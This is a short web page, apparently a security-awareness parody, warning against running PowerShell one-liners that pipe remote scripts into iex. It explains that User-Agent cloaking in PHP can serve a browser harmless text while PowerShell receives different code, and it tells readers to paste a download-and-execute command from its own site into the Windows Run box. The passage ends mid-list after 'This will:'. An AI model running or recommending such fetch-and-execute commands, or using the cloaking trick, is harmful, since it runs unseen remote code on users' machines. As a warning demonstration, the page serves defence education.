If you've ever run a PowerShell one-liner from Reddit like:
irm https://example.com | iex
...congrats — you're the payload.
This site demonstrates how blindly executing scripts can lead to code you never saw, doing things you never agreed to, all while looking clean when you check it later.
We'll show you how a simple trick with User-Agent
and a little PHP can leave zero evidence — even when the calculator pops.
This is a parody. It’s safe, but it’s also a real warning.
Before running anything, check out what the script looks like when viewed in your browser:
https://assgrave.dev/poc
Paste this into the Windows Run box (Win + R
):
powershell -c "iwr https://assgrave.dev/poc | iex"
This will: